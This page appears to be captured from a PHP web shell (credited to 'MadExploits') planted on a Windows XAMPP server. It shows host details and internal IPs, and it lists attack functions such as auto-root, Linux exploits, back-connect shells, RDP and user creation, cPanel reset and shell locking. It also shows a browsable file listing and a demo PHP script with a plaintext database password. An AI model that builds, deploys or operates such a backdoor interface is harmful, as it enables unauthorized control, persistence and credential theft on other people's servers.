Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
contrib /
[ HOME SHELL ]
Name
Size
Permission
Action
BabelSans-B.fdb
39.25
KB
-rw-rw-rw-
cds.xml
368
B
-rw-rw-rw-
dom.php
1.4
KB
-rw-rw-rw-
ftp-mit-perl.pl
275
B
-rw-rw-rw-
ftp-mit-php.php
1.16
KB
-rw-rw-rw-
interbase.php
754
B
-rw-rw-rw-
interbase.pl
1016
B
-rw-rw-rw-
mingstats.html
698
B
-rw-rw-rw-
mingstats_swf.php
2.84
KB
-rw-rw-rw-
mysql.php
644
B
-rw-rw-rw-
mysql.pl
970
B
-rw-rw-rw-
oracle.php
918
B
-rw-rw-rw-
oracle.pl
960
B
-rw-rw-rw-
postgresql.php
1006
B
-rw-rw-rw-
postgresql.pl
986
B
-rw-rw-rw-
sax.php
1
KB
-rw-rw-rw-
soap.php
677
B
-rw-rw-rw-
sql2xml.php
211
B
-rw-rw-rw-
sqlite.php
745
B
-rw-rw-rw-
sqlite.pl
962
B
-rw-rw-rw-
testperldbi.pl
465
B
-rw-rw-rw-
xmlrss.php
572
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : postgresql.php
<html> <head> <title>PHP und PostgreSQL</title> </head> <body> <h1>PHP und PostgreSQL</h1> <table border="1"> <tr> <th>Interpret</th> <th>Titel</th> <th>Jahr</th> </tr> <?php $conn_string = "host=localhost port=5432 dbname=cdcol user=oswald password=geheim"; $db_handle = pg_connect($conn_string); if(!$db_handle) die("Kann Datenbank nicht erreichen!"); $query = "SELECT * FROM cds"; $result = pg_exec($db_handle, $query); if (!$result) { echo pg_errormessage($db_handle); } else { for ($row = 0; $row < pg_numrows($result); $row++) { $values = pg_fetch_array($result, $row, PGSQL_ASSOC); echo "<tr>"; echo "<td>".$values['interpret']."</td>"; echo "<td>".$values['titel']."</td>"; echo "<td>".$values['jahr']."</td>"; echo "</tr>"; } } ?> </table> </body> </html>
Close